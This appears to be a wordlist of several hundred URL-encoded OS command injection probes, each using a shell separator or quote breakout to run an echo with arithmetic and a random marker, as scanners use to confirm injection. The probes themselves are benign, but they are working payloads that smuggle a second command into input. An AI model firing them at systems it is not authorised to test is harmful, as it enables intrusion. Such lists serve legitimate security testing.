+os-command-injection,'"%3Becho%20MMYKAT$((11%2B87))$(echo%20MMYKAT)MMYKAT%22' +os-command-injection,'"%26echo%20YWVNNT$((69%2B85))$(echo%20YWVNNT)YWVNNT%22' +os-command-injection,'"%26%26echo%20HNBMVY$((5%2B65))$(echo%20HNBMVY)HNBMVY%22' +os-command-injection,'"%7Cecho%20WYANEK$((66%2B6))$(echo%20WYANEK)WYANEK%22' +os-command-injection,'"%7C%7Cecho%20NVZIAZ$((98%2B45))$(echo%20NVZIAZ)NVZIAZ%22' +os-command-injection,'"echo%20VTSNKY$((47%2B67))$(echo%20VTSNKY)VTSNKY%5C%5C' +os-command-injection,'"%20echo%20KTLVZA$((31%2B12))$(echo%20KTLVZA)KTLVZA%5C%5C' +os-command-injection,'";echo%20LWIARI$((77%2B11))$(echo%20LWIARI)LWIARI%5C%5C' +os-command-injection,'"&echo%20YMCHJB$((38%2B99))$(echo%20YMCHJB)YMCHJB%5C%5C' +os-command-injection,'"|echo%20DDRLVR$((41%2B36))$(echo%20DDRLVR)DDRLVR%5C%5C' +os-command-injection,'"||echo%20OMAHVH$((14%2B99))$(echo%20OMAHVH)OMAHVH%5C%5C' +os-command-injection,'"&&echo%20PISJQQ$((33%2B72))$(echo%20PISJQQ)PISJQQ%5C%5C' +os-command-injection,'"%0aecho%20SUQJYA$((1%2B59))$(echo%20SUQJYA)SUQJYA%5C%5C' +os-command-injection,'"%3Becho%20WADYUK$((6%2B43))$(echo%20WADYUK)WADYUK%5C%5C' +os-command-injection,'"%26echo%20TGSMRI$((56%2B34))$(echo%20TGSMRI)TGSMRI%5C%5C' +os-command-injection,'"%26%26echo%20FFNJFE$((44%2B38))$(echo%20FFNJFE)FFNJFE%5C%5C' +os-command-injection,'"%7Cecho%20QAFEAV$((75%2B66))$(echo%20QAFEAV)QAFEAV%5C%5C' +os-command-injection,'"%7C%7Cecho%20PHPVAS$((47%2B19))$(echo%20PHPVAS)PHPVAS%5C%5C' +os-command-injection,'"echo%20EPDILQ$((5%2B61))$(echo%20EPDILQ)EPDILQ%2F%2F' +os-command-injection,'"%20echo%20KGLFRE$((0%2B31))$(echo%20KGLFRE)KGLFRE%2F%2F' +os-command-injection,'";echo%20EXOUDI$((91%2B14))$(echo%20EXOUDI)EXOUDI%2F%2F' +os-command-injection,'"&echo%20MTBNOE$((46%2B26))$(echo%20MTBNOE)MTBNOE%2F%2F' +os-command-injection,'"|echo%20CPTRGO$((21%2B79))$(echo%20CPTRGO)CPTRGO%2F%2F' +os-command-injection,'"||echo%20QDYNED$((79%2B86))$(echo%20QDYNED)QDYNED%2F%2F' +os-command-injection,'"&&echo%20NMVRBB$((60%2B26))$(echo%20NMVRBB)NMVRBB%2F%2F' +os-command-injection,'"%0aecho%20BGHKOM$((19%2B31))$(echo%20BGHKOM)BGHKOM%2F%2F' +os-command-injection,'"%3Becho%20NQDGAY$((73%2B33))$(echo%20NQDGAY)NQDGAY%2F%2F' +os-command-injection,'"%26echo%20QSDXQR$((21%2B3))$(echo%20QSDXQR)QSDXQR%2F%2F' +os-command-injection,'"%26%26echo%20KAOPJJ$((97%2B96))$(echo%20KAOPJJ)KAOPJJ%2F%2F' +os-command-injection,'"%7Cecho%20FXXYAL$((38%2B83))$(echo%20FXXYAL)FXXYAL%2F%2F' +os-command-injection,'"%7C%7Cecho%20UBEZEA$((22%2B25))$(echo%20UBEZEA)UBEZEA%2F%2F' +os-command-injection,'"echo%20WXRSMM$((62%2B81))$(echo%20WXRSMM)WXRSMM%26' +os-command-injection,'"%20echo%20OQFTMT$((91%2B48))$(echo%20OQFTMT)OQFTMT%26' +os-command-injection,'";echo%20KLODWM$((81%2B43))$(echo%20KLODWM)KLODWM%26' +os-command-injection,'"&echo%20LHBNPU$((26%2B5))$(echo%20LHBNPU)LHBNPU%26' +os-command-injection,'"|echo%20GLNWTR$((75%2B96))$(echo%20GLNWTR)GLNWTR%26' +os-command-injection,'"||echo%20GRZSSH$((83%2B88))$(echo%20GRZSSH)GRZSSH%26' +os-command-injection,'"&&echo%20FLLKBG$((76%2B53))$(echo%20FLLKBG)FLLKBG%26' +os-command-injection,'"%0aecho%20QBALEF$((39%2B26))$(echo%20QBALEF)QBALEF%26' +os-command-injection,'"%3Becho%20WVYDHU$((64%2B10))$(echo%20WVYDHU)WVYDHU%26' +os-command-injection,'"%26echo%20YKYSMI$((14%2B15))$(echo%20YKYSMI)YKYSMI%26' +os-command-injection,'"%26%26echo%20TZMDSB$((68%2B98))$(echo%20TZMDSB)TZMDSB%26' +os-command-injection,'"%7Cecho%20JUMRWV$((18%2B92))$(echo%20JUMRWV)JUMRWV%26' +os-command-injection,'"%7C%7Cecho%20NLZITW$((11%2B41))$(echo%20NLZITW)NLZITW%26' +os-command-injection,'"echo%20BNHMPM$((4%2B77))$(echo%20BNHMPM)BNHMPM%7C' +os-command-injection,'"%20echo%20TZKEKG$((48%2B96))$(echo%20TZKEKG)TZKEKG%7C' +os-command-injection,'";echo%20IBQUEF$((98%2B95))$(echo%20IBQUEF)IBQUEF%7C' +os-command-injection,'"&echo%20EHEGZM$((64%2B33))$(echo%20EHEGZM)EHEGZM%7C' +os-command-injection,'"|echo%20XTNGGL$((91%2B22))$(echo%20XTNGGL)XTNGGL%7C' +os-command-injection,'"||echo%20OHBDBS$((38%2B62))$(echo%20OHBDBS)OHBDBS%7C' +os-command-injection,'"&&echo%20IOUKTY$((23%2B26))$(echo%20IOUKTY)IOUKTY%7C' +os-command-injection,'"%0aecho%20JLXCCQ$((76%2B40))$(echo%20JLXCCQ)JLXCCQ%7C' +os-command-injection,'"%3Becho%20WRYICW$((92%2B9))$(echo%20WRYICW)WRYICW%7C' +os-command-injection,'"%26echo%20LNTOCN$((59%2B67))$(echo%20LNTOCN)LNTOCN%7C' +os-command-injection,'"%26%26echo%20WSLHMV$((15%2B92))$(echo%20WSLHMV)WSLHMV%7C' +os-command-injection,'"%7Cecho%20ICAVIW$((19%2B96))$(echo%20ICAVIW)ICAVIW%7C' +os-command-injection,'"%7C%7Cecho%20TSQXVM$((77%2B52))$(echo%20TSQXVM)TSQXVM%7C' +os-command-injection,'|echo%20XHGLDQ$((49%2B17))$(echo%20XHGLDQ)XHGLDQ' +os-command-injection,'|%20echo%20USBVMG$((4%2B90))$(echo%20USBVMG)USBVMG' +os-command-injection,';echo%20ESBMYC$((3%2B57))$(echo%20ESBMYC)ESBMYC' +os-command-injection,'&echo%20DPXLYV$((75%2B2))$(echo%20DPXLYV)DPXLYV' +os-command-injection,'|echo%20WKXARD$((95%2B10))$(echo%20WKXARD)WKXARD' +os-command-injection,'||echo%20QQNXUE$((73%2B58))$(echo%20QQNXUE)QQNXUE' +os-command-injection,'&&echo%20WMETWL$((1%2B53))$(echo%20WMETWL)WMETWL' +os-command-injection,'%0aecho%20VFMAJZ$((49%2B82))$(echo%20VFMAJZ)VFMAJZ' +os-command-injection,'%3Becho%20EFMVRM$((22%2B51))$(echo%20EFMVRM)EFMVRM' +os-command-injection,'%26echo%20CFQNOE$((61%2B46))$(echo%20CFQNOE)CFQNOE' +os-command-injection,'%26%26echo%20DTVUWP$((97%2B67))$(echo%20DTVUWP)DTVUWP' +os-command-injection,'%7Cecho%20NIEMKE$((13%2B11))$(echo%20NIEMKE)NIEMKE' +os-command-injection,'%7C%7Cecho%20KTTKHD$((67%2B44))$(echo%20KTTKHD)KTTKHD' +os-command-injection,'echo%20KBEMAI$((13%2B27))$(echo%20KBEMAI)KBEMAI'' +os-command-injection,'%20echo%20PQVHOY$((31%2B46))$(echo%20PQVHOY)PQVHOY'' +os-command-injection,';echo%20CUJAIZ$((32%2B35))$(echo%20CUJAIZ)CUJAIZ'' +os-command-injection,'&echo%20PLNWCY$((48%2B70))$(echo%20PLNWCY)PLNWCY'' +os-command-injection,'|echo%20FHWWQB$((42%2B27))$(echo%20FHWWQB)FHWWQB'' +os-command-injection,'||echo%20ZSEPNF$((89%2B60))$(echo%20ZSEPNF)ZSEPNF'' +os-command-injection,'&&echo%20ZVYTEU$((90%2B87))$(echo%20ZVYTEU)ZVYTEU'' +os-command-injection,'%0aecho%20RWVTYR$((38%2B86))$(echo%20RWVTYR)RWVTYR'' +os-command-injection,'%3Becho%20PDWIBS$((76%2B7))$(echo%20PDWIBS)PDWIBS'' +os-command-injection,'%26echo%20VDRXRP$((8%2B96))$(echo%20VDRXRP)VDRXRP'' +os-command-injection,'%26%26echo%20KOBQCV$((27%2B2))$(echo%20KOBQCV)KOBQCV'' +os-command-injection,'%7Cecho%20UZKGGW$((60%2B30))$(echo%20UZKGGW)UZKGGW'' +os-command-injection,'%7C%7Cecho%20HVEVCZ$((20%2B29))$(echo%20HVEVCZ)HVEVCZ'' +os-command-injection,'echo%20NRCXSS$((87%2B18))$(echo%20NRCXSS)NRCXSS"' +os-command-injection,'%20echo%20RPDFEQ$((68%2B74))$(echo%20RPDFEQ)RPDFEQ"' +os-command-injection,';echo%20VFFQVI$((85%2B47))$(echo%20VFFQVI)VFFQVI"' +os-command-injection,'&echo%20CUKTGK$((2%2B61))$(echo%20CUKTGK)CUKTGK"' +os-command-injection,'|echo%20WJNDLY$((76%2B22))$(echo%20WJNDLY)WJNDLY"' +os-command-injection,'||echo%20YZMMII$((39%2B60))$(echo%20YZMMII)YZMMII"' +os-command-injection,'&&echo%20ARDPUW$((94%2B28))$(echo%20ARDPUW)ARDPUW"' +os-command-injection,'%0aecho%20UNXWMT$((40%2B95))$(echo%20UNXWMT)UNXWMT"' +os-command-injection,'%3Becho%20NAPRQZ$((30%2B63))$(echo%20NAPRQZ)NAPRQZ"' +os-command-injection,'%26echo%20UCMRWH$((43%2B12))$(echo%20UCMRWH)UCMRWH"' +os-command-injection,'%26%26echo%20WXDFTC$((82%2B43))$(echo%20WXDFTC)WXDFTC"' +os-command-injection,'%7Cecho%20WEFNXM$((36%2B97))$(echo%20WEFNXM)WEFNXM"' +os-command-injection,'%7C%7Cecho%20FCVZMK$((81%2B22))$(echo%20FCVZMK)FCVZMK"' +os-command-injection,'echo%20OQDPSL$((47%2B24))$(echo%20OQDPSL)OQDPSL' +os-command-injection,'%20echo%20SILUZP$((90%2B7))$(echo%20SILUZP)SILUZP' +os-command-injection,';echo%20ROYDKA$((65%2B12))$(echo%20ROYDKA)ROYDKA' +os-command-injection,'&echo%20FGFXYB$((41%2B62))$(echo%20FGFXYB)FGFXYB' +os-command-injection,'|echo%20TTDDZC$((95%2B92))$(echo%20TTDDZC)TTDDZC' +os-command-injection,'||echo%20VXNNZC$((25%2B32))$(echo%20VXNNZC)VXNNZC' +os-command-injection,'&&echo%20TQHCUN$((6%2B71))$(echo%20TQHCUN)TQHCUN' +os-command-injection,'%0aecho%20LLPOAO$((93%2B93))$(echo%20LLPOAO)LLPOAO' +os-command-injection,'%3Becho%20QPNMNQ$((33%2B62))$(echo%20QPNMNQ)QPNMNQ' +os-command-injection,'%26echo%20BCONMT$((21%2B78))$(echo%20BCONMT)BCONMT' +os-command-injection,'%26%26echo%20HRLRGU$((89%2B5))$(echo%20HRLRGU)HRLRGU' +os-command-injection,'%7Cecho%20MSOAVP$((20%2B27))$(echo%20MSOAVP)MSOAVP' +os-command-injection,'%7C%7Cecho%20NYSCWX$((31%2B90))$(echo%20NYSCWX)NYSCWX' +os-command-injection,'echo%20GCITOP$((61%2B30))$(echo%20GCITOP)GCITOP//' +os-command-injection,'%20echo%20FKCLCN$((17%2B95))$(echo%20FKCLCN)FKCLCN//' +os-command-injection,';echo%20RAOGCR$((98%2B45))$(echo%20RAOGCR)RAOGCR//' +os-command-injection,'&echo%20NLPFSA$((24%2B13))$(echo%20NLPFSA)NLPFSA//' +os-command-injection,'|echo%20UTOZMO$((44%2B11))$(echo%20UTOZMO)UTOZMO//' +os-command-injection,'||echo%20XYTCPC$((29%2B30))$(echo%20XYTCPC)XYTCPC//' +os-command-injection,'&&echo%20NCEXJG$((72%2B12))$(echo%20NCEXJG)NCEXJG//' +os-command-injection,'%0aecho%20XSPTNK$((94%2B10))$(echo%20XSPTNK)XSPTNK//' +os-command-injection,'%3Becho%20RQIPKI$((2%2B84))$(echo%20RQIPKI)RQIPKI//' +os-command-injection,'%26echo%20NCDDER$((2%2B81))$(echo%20NCDDER)NCDDER//' +os-command-injection,'%26%26echo%20KPDDNO$((99%2B75))$(echo%20KPDDNO)KPDDNO//' +os-command-injection,'%7Cecho%20MSSIPE$((43%2B93))$(echo%20MSSIPE)MSSIPE//' +os-command-injection,'%7C%7Cecho%20ZZFTJX$((6%2B69))$(echo%20ZZFTJX)ZZFTJX//' +os-command-injection,'echo%20SPARDK$((38%2B33))$(echo%20SPARDK)SPARDK\' +os-command-injection,'%20echo%20WIJKEI$((0%2B41))$(echo%20WIJKEI)WIJKEI\' +os-command-injection,';echo%20DQKPUN$((89%2B48))$(echo%20DQKPUN)DQKPUN\' +os-command-injection,'&echo%20FQACTW$((22%2B3))$(echo%20FQACTW)FQACTW\' +os-command-injection,'|echo%20CAUDBF$((21%2B9))$(echo%20CAUDBF)CAUDBF\' +os-command-injection,'||echo%20ERSZFY$((55%2B21))$(echo%20ERSZFY)ERSZFY\' +os-command-injection,'&&echo%20JLZBTB$((60%2B18))$(echo%20JLZBTB)JLZBTB\' +os-command-injection,'%0aecho%20YZOZQS$((66%2B37))$(echo%20YZOZQS)YZOZQS\' +os-command-injection,'%3Becho%20FREAIO$((83%2B11))$(echo%20FREAIO)FREAIO\' +os-command-injection,'%26echo%20XMWQUR$((78%2B32))$(echo%20XMWQUR)XMWQUR\' +os-command-injection,'%26%26echo%20CQZWFA$((30%2B41))$(echo%20CQZWFA)CQZWFA\' +os-command-injection,'%7Cecho%20SBQEFZ$((80%2B12))$(echo%20SBQEFZ)SBQEFZ\' +os-command-injection,'%7C%7Cecho%20MMJATU$((39%2B34))$(echo%20MMJATU)MMJATU\' +os-command-injection,'echo%20PZDGKF$((44%2B50))$(echo%20PZDGKF)PZDGKF&' +os-command-injection,'%20echo%20GRYEIF$((54%2B91))$(echo%20GRYEIF)GRYEIF&' +os-command-injection,';echo%20KTOGAF$((50%2B40))$(echo%20KTOGAF)KTOGAF&' +os-command-injection,'&echo%20ANYKUW$((28%2B42))$(echo%20ANYKUW)ANYKUW&' +os-command-injection,'|echo%20NDQGOQ$((5%2B63))$(echo%20NDQGOQ)NDQGOQ&' +os-command-injection,'||echo%20ZQDJTK$((80%2B61))$(echo%20ZQDJTK)ZQDJTK&' +os-command-injection,'&&echo%20EFKXWC$((29%2B48))$(echo%20EFKXWC)EFKXWC&' +os-command-injection,'%0aecho%20OJUIJZ$((60%2B38))$(echo%20OJUIJZ)OJUIJZ&' +os-command-injection,'%3Becho%20HGJGSA$((25%2B26))$(echo%20HGJGSA)HGJGSA&' +os-command-injection,'%26echo%20DFYQEU$((76%2B77))$(echo%20DFYQEU)DFYQEU&' +os-command-injection,'%26%26echo%20ZCRZFW$((63%2B13))$(echo%20ZCRZFW)ZCRZFW&' +os-command-injection,'%7Cecho%20PSOVYF$((34%2B8))$(echo%20PSOVYF)PSOVYF&' +os-command-injection,'%7C%7Cecho%20GFQYZE$((23%2B31))$(echo%20GFQYZE)GFQYZE&' +os-command-injection,'echo%20TBRADG$((53%2B31))$(echo%20TBRADG)TBRADG|' +os-command-injection,'%20echo%20PBUFFX$((8%2B76))$(echo%20PBUFFX)PBUFFX|' +os-command-injection,';echo%20UKUZES$((38%2B87))$(echo%20UKUZES)UKUZES|' +os-command-injection,'&echo%20QVKVEF$((65%2B70))$(echo%20QVKVEF)QVKVEF|' +os-command-injection,'|echo%20QAVNFZ$((68%2B13))$(echo%20QAVNFZ)QAVNFZ|' +os-command-injection,'||echo%20QUULXG$((42%2B65))$(echo%20QUULXG)QUULXG|' +os-command-injection,'&&echo%20ECAYHK$((20%2B55))$(echo%20ECAYHK)ECAYHK|' +os-command-injection,'%0aecho%20EZVLSY$((12%2B10))$(echo%20EZVLSY)EZVLSY|' +os-command-injection,'%3Becho%20HFWMJZ$((75%2B92))$(echo%20HFWMJZ)HFWMJZ|' +os-command-injection,'%26echo%20FRKJNT$((96%2B80))$(echo%20FRKJNT)FRKJNT|' +os-command-injection,'%26%26echo%20LSCMRZ$((76%2B36))$(echo%20LSCMRZ)LSCMRZ|' +os-command-injection,'%7Cecho%20HXHRTD$((13%2B48))$(echo%20HXHRTD)HXHRTD|' +os-command-injection,'%7C%7Cecho%20NLRFUJ$((16%2B3))$(echo%20NLRFUJ)NLRFUJ|' +os-command-injection,'echo%20DGPFLA$((83%2B1))$(echo%20DGPFLA)DGPFLA%27' +os-command-injection,'%20echo%20DCVFLD$((69%2B75))$(echo%20DCVFLD)DCVFLD%27' +os-command-injection,';echo%20NHFBAI$((91%2B84))$(echo%20NHFBAI)NHFBAI%27' +os-command-injection,'&echo%20JOKPJU$((39%2B3))$(echo%20JOKPJU)JOKPJU%27' +os-command-injection,'|echo%20IQEMUQ$((97%2B10))$(echo%20IQEMUQ)IQEMUQ%27' +os-command-injection,'||echo%20BTEWHM$((5%2B57))$(echo%20BTEWHM)BTEWHM%27' +os-command-injection,'&&echo%20MNUDNV$((12%2B9))$(echo%20MNUDNV)MNUDNV%27' +os-command-injection,'%0aecho%20SATWYE$((53%2B54))$(echo%20SATWYE)SATWYE%27' +os-command-injection,'%3Becho%20SETBTR$((9%2B96))$(echo%20SETBTR)SETBTR%27' +os-command-injection,'%26echo%20KNBVGS$((2%2B62))$(echo%20KNBVGS)KNBVGS%27' +os-command-injection,'%26%26echo%20KJZRGW$((6%2B53))$(echo%20KJZRGW)KJZRGW%27' +os-command-injection,'%7Cecho%20WTZBYV$((78%2B41))$(echo%20WTZBYV)WTZBYV%27' +os-command-injection,'%7C%7Cecho%20MUPATQ$((93%2B5))$(echo%20MUPATQ)MUPATQ%27' +os-command-injection,'echo%20FJUZMD$((40%2B24))$(echo%20FJUZMD)FJUZMD%22' +os-command-injection,'%20echo%20GTGFVS$((86%2B52))$(echo%20GTGFVS)GTGFVS%22' +os-command-injection,';echo%20SXGZIM$((69%2B52))$(echo%20SXGZIM)SXGZIM%22' +os-command-injection,'&echo%20HJRGTK$((97%2B88))$(echo%20HJRGTK)HJRGTK%22' +os-command-injection,'|echo%20DWSCBS$((75%2B48))$(echo%20DWSCBS)DWSCBS%22' +os-command-injection,'||echo%20OVDJWG$((12%2B73))$(echo%20OVDJWG)OVDJWG%22' +os-command-injection,'&&echo%20QDULCS$((14%2B19))$(echo%20QDULCS)QDULCS%22' +os-command-injection,'%0aecho%20FBTRKX$((12%2B17))$(echo%20FBTRKX)FBTRKX%22' +os-command-injection,'%3Becho%20UZVXVR$((66%2B82))$(echo%20UZVXVR)UZVXVR%22' +os-command-injection,'%26echo%20MHDYGG$((49%2B88))$(echo%20MHDYGG)MHDYGG%22' +os-command-injection,'%26%26echo%20ZOUFKS$((71%2B23))$(echo%20ZOUFKS)ZOUFKS%22' +os-command-injection,'%7Cecho%20VKLXSK$((91%2B24))$(echo%20VKLXSK)VKLXSK%22' +os-command-injection,'%7C%7Cecho%20DQMLLV$((10%2B50))$(echo%20DQMLLV)DQMLLV%22' +os-command-injection,'echo%20DAPXMM$((19%2B99))$(echo%20DAPXMM)DAPXMM%5C%5C' +os-command-injection,'%20echo%20YPJVNC$((48%2B74))$(echo%20YPJVNC)YPJVNC%5C%5C' +os-command-injection,';echo%20HUWTGD$((19%2B3))$(echo%20HUWTGD)HUWTGD%5C%5C' +os-command-injection,'&echo%20LDMWNX$((39%2B93))$(echo%20LDMWNX)LDMWNX%5C%5C' +os-command-injection,'|echo%20WAXRWD$((80%2B57))$(echo%20WAXRWD)WAXRWD%5C%5C' +os-command-injection,'||echo%20JFXLVC$((83%2B84))$(echo%20JFXLVC)JFXLVC%5C%5C' +os-command-injection,'&&echo%20RCCBBV$((37%2B98))$(echo%20RCCBBV)RCCBBV%5C%5C' +os-command-injection,'%0aecho%20ZWEWEE$((81%2B57))$(echo%20ZWEWEE)ZWEWEE%5C%5C' +os-command-injection,'%3Becho%20ISFWLN$((61%2B53))$(echo%20ISFWLN)ISFWLN%5C%5C' +os-command-injection,'%26echo%20DFIOYS$((27%2B56))$(echo%20DFIOYS)DFIOYS%5C%5C' +os-command-injection,'%26%26echo%20JRNAMJ$((68%2B44))$(echo%20JRNAMJ)JRNAMJ%5C%5C' +os-command-injection,'%7Cecho%20YUWHXN$((65%2B16))$(echo%20YUWHXN)YUWHXN%5C%5C' +os-command-injection,'%7C%7Cecho%20JCLZPJ$((70%2B40))$(echo%20JCLZPJ)JCLZPJ%5C%5C' +os-command-injection,'echo%20FVWBKZ$((56%2B38))$(echo%20FVWBKZ)FVWBKZ%2F%2F' +os-command-injection,'%20echo%20WRSAKG$((59%2B68))$(echo%20WRSAKG)WRSAKG%2F%2F' +os-command-injection,';echo%20FFDHYG$((63%2B20))$(echo%20FFDHYG)FFDHYG%2F%2F' +os-command-injection,'&echo%20JBPWLJ$((57%2B13))$(echo%20JBPWLJ)JBPWLJ%2F%2F' +os-command-injection,'|echo%20FUUFIA$((12%2B61))$(echo%20FUUFIA)FUUFIA%2F%2F' +os-command-injection,'||echo%20HGLIQL$((80%2B19))$(echo%20HGLIQL)HGLIQL%2F%2F' +os-command-injection,'&&echo%20HMERTY$((95%2B54))$(echo%20HMERTY)HMERTY%2F%2F' +os-command-injection,'%0aecho%20HLIPMG$((9%2B10))$(echo%20HLIPMG)HLIPMG%2F%2F' +os-command-injection,'%3Becho%20WZQZMU$((55%2B24))$(echo%20WZQZMU)WZQZMU%2F%2F' +os-command-injection,'%26echo%20PAEWVB$((55%2B53))$(echo%20PAEWVB)PAEWVB%2F%2F' +os-command-injection,'%26%26echo%20PILBFC$((9%2B73))$(echo%20PILBFC)PILBFC%2F%2F' +os-command-injection,'%7Cecho%20HEMYTZ$((83%2B92))$(echo%20HEMYTZ)HEMYTZ%2F%2F' +os-command-injection,'%7C%7Cecho%20TERRZN$((57%2B89))$(echo%20TERRZN)TERRZN%2F%2F' +os-command-injection,'echo%20YMGFHG$((56%2B20))$(echo%20YMGFHG)YMGFHG%26' +os-command-injection,'%20echo%20KACUJG$((17%2B57))$(echo%20KACUJG)KACUJG%26' +os-command-injection,';echo%20JYXFUS$((22%2B98))$(echo%20JYXFUS)JYXFUS%26' +os-command-injection,'&echo%20ZMZTLJ$((97%2B61))$(echo%20ZMZTLJ)ZMZTLJ%26' +os-command-injection,'|echo%20MRVYMS$((85%2B67))$(echo%20MRVYMS)MRVYMS%26' +os-command-injection,'||echo%20CZQCUH$((88%2B14))$(echo%20CZQCUH)CZQCUH%26' +os-command-injection,'&&echo%20LDERRF$((18%2B3))$(echo%20LDERRF)LDERRF%26' +os-command-injection,'%0aecho%20BLBAVR$((79%2B49))$(echo%20BLBAVR)BLBAVR%26' +os-command-injection,'%3Becho%20BKDTSI$((78%2B91))$(echo%20BKDTSI)BKDTSI%26' +os-command-injection,'%26echo%20OGAQAD$((97%2B22))$(echo%20OGAQAD)OGAQAD%26' +os-command-injection,'%26%26echo%20BBBUFB$((63%2B41))$(echo%20BBBUFB)BBBUFB%26' +os-command-injection,'%7Cecho%20KZQFJT$((26%2B74))$(echo%20KZQFJT)KZQFJT%26' +os-command-injection,'%7C%7Cecho%20OVBFOE$((46%2B36))$(echo%20OVBFOE)OVBFOE%26' +os-command-injection,'echo%20IXGYZZ$((51%2B23))$(echo%20IXGYZZ)IXGYZZ%7C' +os-command-injection,'%20echo%20NYGDLL$((82%2B79))$(echo%20NYGDLL)NYGDLL%7C' +os-command-injection,';echo%20TDHCPF$((21%2B38))$(echo%20TDHCPF)TDHCPF%7C' +os-command-injection,'&echo%20WTDJVU$((89%2B9))$(echo%20WTDJVU)WTDJVU%7C' +os-command-injection,'|echo%20UKBANH$((70%2B33))$(echo%20UKBANH)UKBANH%7C' +os-command-injection,'||echo%20UWJWIH$((97%2B96))$(echo%20UWJWIH)UWJWIH%7C' +os-command-injection,'&&echo%20STFNSK$((89%2B70))$(echo%20STFNSK)STFNSK%7C' +os-command-injection,'%0aecho%20FDJRHK$((66%2B94))$(echo%20FDJRHK)FDJRHK%7C' +os-command-injection,'%3Becho%20DCWGLU$((82%2B36))$(echo%20DCWGLU)DCWGLU%7C' +os-command-injection,'%26echo%20SJQERK$((87%2B3))$(echo%20SJQERK)SJQERK%7C' +os-command-injection,'%26%26echo%20AWXHOA$((97%2B59))$(echo%20AWXHOA)AWXHOA%7C' +os-command-injection,'%7Cecho%20VIYOLO$((54%2B86))$(echo%20VIYOLO)VIYOLO%7C' +os-command-injection,'%7C%7Cecho%20YNEGDR$((66%2B88))$(echo%20YNEGDR)YNEGDR%7C' +os-command-injection,'&echo%20CWKFHD$((44%2B85))$(echo%20CWKFHD)CWKFHD' +os-command-injection,'&%20echo%20KETLTE$((63%2B93))$(echo%20KETLTE)KETLTE' +os-command-injection,';echo%20VMNDNS$((4%2B99))$(echo%20VMNDNS)VMNDNS' +os-command-injection,'&echo%20SSAQOI$((4%2B7))$(echo%20SSAQOI)SSAQOI' +os-command-injection,'|echo%20XUPXZX$((83%2B57))$(echo%20XUPXZX)XUPXZX' +os-command-injection,'||echo%20NAEKVJ$((41%2B68))$(echo%20NAEKVJ)NAEKVJ' +os-command-injection,'&&echo%20MPUVIU$((4%2B26))$(echo%20MPUVIU)MPUVIU' +os-command-injection,'%0aecho%20FHNIBR$((51%2B94))$(echo%20FHNIBR)FHNIBR' +os-command-injection,'%3Becho%20SSPZUQ$((62%2B73))$(echo%20SSPZUQ)SSPZUQ' +os-command-injection,'%26echo%20DRFJEZ$((0%2B71))$(echo%20DRFJEZ)DRFJEZ' +os-command-injection,'%26%26echo%20VYNOHQ$((96%2B30))$(echo%20VYNOHQ)VYNOHQ' +os-command-injection,'%7Cecho%20KOAHWY$((4%2B67))$(echo%20KOAHWY)KOAHWY' +os-command-injection,'%7C%7Cecho%20OBGZFK$((77%2B1))$(echo%20OBGZFK)OBGZFK' +os-command-injection,'echo%20RFRFQM$((78%2B19))$(echo%20RFRFQM)RFRFQM'' +os-command-injection,'%20echo%20OTWDTY$((69%2B66))$(echo%20OTWDTY)OTWDTY'' +os-command-injection,';echo%20PSMUSP$((33%2B35))$(echo%20PSMUSP)PSMUSP'' +os-command-injection,'&echo%20MYJSKQ$((23%2B79))$(echo%20MYJSKQ)MYJSKQ'' +os-command-injection,'|echo%20OKCZRM$((7%2B40))$(echo%20OKCZRM)OKCZRM'' +os-command-injection,'||echo%20BDYSBD$((59%2B26))$(echo%20BDYSBD)BDYSBD'' +os-command-injection,'&&echo%20CALIKN$((75%2B57))$(echo%20CALIKN)CALIKN'' +os-command-injection,'%0aecho%20KYPKBG$((37%2B59))$(echo%20KYPKBG)KYPKBG'' +os-command-injection,'%3Becho%20AVWPBO$((84%2B81))$(echo%20AVWPBO)AVWPBO'' +os-command-injection,'%26echo%20HAZQII$((51%2B98))$(echo%20HAZQII)HAZQII'' +os-command-injection,'%26%26echo%20HDOQYX$((44%2B88))$(echo%20HDOQYX)HDOQYX'' +os-command-injection,'%7Cecho%20KYMYXN$((53%2B93))$(echo%20KYMYXN)KYMYXN'' +os-command-injection,'%7C%7Cecho%20BHIGBI$((12%2B1))$(echo%20BHIGBI)BHIGBI'' +os-command-injection,'echo%20MIZDMG$((78%2B69))$(echo%20MIZDMG)MIZDMG"' +os-command-injection,'%20echo%20YPBKYU$((68%2B53))$(echo%20YPBKYU)YPBKYU"' +os-command-injection,';echo%20KTEBYS$((87%2B50))$(echo%20KTEBYS)KTEBYS"' +os-command-injection,'&echo%20ZJVXWJ$((77%2B27))$(echo%20ZJVXWJ)ZJVXWJ"' +os-command-injection,'|echo%20BHRXBC$((7%2B14))$(echo%20BHRXBC)BHRXBC"' +os-command-injection,'||echo%20MZRLUX$((2%2B69))$(echo%20MZRLUX)MZRLUX"' +os-command-injection,'&&echo%20CKBCFD$((43%2B41))$(echo%20CKBCFD)CKBCFD"' +os-command-injection,'%0aecho%20OJCTNP$((66%2B93))$(echo%20OJCTNP)OJCTNP"' +os-command-injection,'%3Becho%20RYBOGB$((74%2B55))$(echo%20RYBOGB)RYBOGB"' +os-command-injection,'%26echo%20RROLAU$((57%2B22))$(echo%20RROLAU)RROLAU"' +os-command-injection,'%26%26echo%20QCERHI$((79%2B52))$(echo%20QCERHI)QCERHI"' +os-command-injection,'%7Cecho%20UQZQYN$((62%2B42))$(echo%20UQZQYN)UQZQYN"' +os-command-injection,'%7C%7Cecho%20JNIARV$((94%2B19))$(echo%20JNIARV)JNIARV"' +os-command-injection,'echo%20HDXQEJ$((71%2B79))$(echo%20HDXQEJ)HDXQEJ' +os-command-injection,'%20echo%20YNTIWO$((3%2B12))$(echo%20YNTIWO)YNTIWO' +os-command-injection,';echo%20TKERVJ$((79%2B50))$(echo%20TKERVJ)TKERVJ' +os-command-injection,'&echo%20IWRTXC$((50%2B84))$(echo%20IWRTXC)IWRTXC' +os-command-injection,'|echo%20STRIJS$((21%2B85))$(echo%20STRIJS)STRIJS' +os-command-injection,'||echo%20MCNCTF$((18%2B60))$(echo%20MCNCTF)MCNCTF' +os-command-injection,'&&echo%20ISDEXD$((91%2B65))$(echo%20ISDEXD)ISDEXD' +os-command-injection,'%0aecho%20XSVPWX$((48%2B3))$(echo%20XSVPWX)XSVPWX' +os-command-injection,'%3Becho%20CKRVVJ$((84%2B10))$(echo%20CKRVVJ)CKRVVJ' +os-command-injection,'%26echo%20KWUNXK$((77%2B2))$(echo%20KWUNXK)KWUNXK' +os-command-injection,'%26%26echo%20KYOTEZ$((85%2B71))$(echo%20KYOTEZ)KYOTEZ' +os-command-injection,'%7Cecho%20ULTUWD$((51%2B75))$(echo%20ULTUWD)ULTUWD' 